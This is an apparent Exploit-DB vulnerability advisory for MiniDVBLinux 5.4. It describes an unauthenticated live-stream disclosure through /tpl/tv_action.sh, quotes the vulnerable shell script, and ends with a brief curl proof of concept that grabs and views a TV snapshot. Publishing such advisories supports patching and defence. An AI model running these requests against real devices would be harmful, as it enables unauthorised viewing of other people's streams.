MiniDVBLinux 5.4 - Unauthenticated Stream Disclosure

vendor:

MiniDVBLinux

by:

LiquidWorm

7.5

CVSS

HIGH

Unauthenticated Stream Disclosure

200

CWE

Product Name: MiniDVBLinux

Affected Version From: <=5.4

Affected Version To: <=5.4

Patch Exists: YES

Related CWE:

CPE: a:minidvblinux:minidvblinux

Metasploit:

Other Scripts:

Platforms Tested: armhf, armhf-rpi2, GNU/Linux 4.19.127.203 (armv7l), VideoDiskRecorder 2.4.6

2022

MiniDVBLinux 5.4 – Unauthenticated Stream Disclosure

The application suffers from an unauthenticated live stream disclosure when /tpl/tv_action.sh is called and generates a snapshot in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

Mitigation:

Ensure that authentication is required for all requests to the application.

Source

Exploit-DB raw data:

# Exploit Title: MiniDVBLinux 5.4  - Unauthenticated Stream Disclosure
# Exploit Author: LiquidWorm
MiniDVBLinux 5.4 Unauthenticated Stream Disclosure Vulnerability


Vendor: MiniDVBLinux
Product web page: https://www.minidvblinux.de
Affected version: <=5.4

Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple
way to convert a standard PC into a Multi Media Centre based on the
Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this
Linux based Digital Video Recorder: Watch TV, Timer controlled
recordings, Time Shift, DVD and MP3 Replay, Setup and configuration
via browser, and a lot more. MLD strives to be as small as possible,
modular, simple. It supports numerous hardware platforms, like classic
desktops in 32/64bit and also various low power ARM systems.

Desc: The application suffers from an unauthenticated live stream
disclosure when /tpl/tv_action.sh is called and generates a snapshot
in /var/www/images/tv.jpg through the Simple VDR Protocol (SVDRP).

--------------------------------------------------------------------
/var/www/tpl/tv_action.sh:
--------------------------
01: #!/bin/sh
02:
03: header
04:
05: quality=60
06: svdrpsend.sh "GRAB /tmp/tv.jpg $quality $(echo "$query" | sed "s/width=\(.*\)&height=\(.*\)/\1 \2/g")"
07: mv -f /tmp/tv.jpg /var/www/images 2>/dev/null
--------------------------------------------------------------------

Tested on: MiniDVBLinux 5.4
           BusyBox v1.25.1
           Architecture: armhf, armhf-rpi2
           GNU/Linux 4.19.127.203 (armv7l)
           VideoDiskRecorder 2.4.6


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2022-5716
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5716.php


24.09.2022

--


1. Generate screengrab:
 - Request: curl http://ip:8008/tpl/tv_action.sh -H "Accept: */*"
 - Response: 
220 mld SVDRP VideoDiskRecorder 2.4.6; Mon Sep 12 00:44:10 2022; UTF-8
250 Grabbed image /tmp/tv.jpg 60
221 mld closing connection

2. View screengrab:
 - Request: curl http://ip:8008/images/tv.jpg

3. Or use a browser:
 - http://ip:8008/home?site=remotecontrol